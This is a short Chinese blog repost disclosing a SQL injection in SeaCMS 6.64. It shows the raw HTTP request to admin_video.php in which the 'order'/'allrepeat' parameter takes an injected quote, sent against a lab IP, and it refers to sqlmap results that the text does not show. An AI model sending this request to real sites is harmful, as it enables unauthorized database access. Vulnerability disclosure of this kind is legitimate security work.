码迷,mamicode.com
首页 > 数据库 > 详细

SeaCMS 6.64 sql注入

时间:2018-09-19 17:19:16      阅读:285      评论:0      收藏:0      [点我收藏+]

标签:action   admin   mac   cto   close   dmi   load   water   sql   

SeaCMS 6.64 sql注入

请求数据包:
order参数存在sql注入

GET /seacms6.64/upload/admin/admin_video.php?repeat=ok&order=v_name&allrepeat=ok‘ HTTP/1.1
Host: 172.16.173.249
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.13; rv:61.0) Gecko/20100101 Firefox/61.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,/;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Referer: http://172.16.173.203/seacms6.64 ... e.php?action=repeat
Cookie: PHPSESSID=odsoljsk6cvfkvcgm0i03v8np6
Connection: close
Upgrade-Insecure-Requests: 1

sqlmap扫描结果:
技术分享图片

数据库名:
技术分享图片

SeaCMS 6.64 sql注入

标签:action   admin   mac   cto   close   dmi   load   water   sql   

原文地址:http://blog.51cto.com/13770310/2177214

(0)
(0)
   
举报
评论 一句话评论(0
登录后才能评论!
© 2014 mamicode.com 版权所有  联系我们:gaon5@hotmail.com
迷上了代码!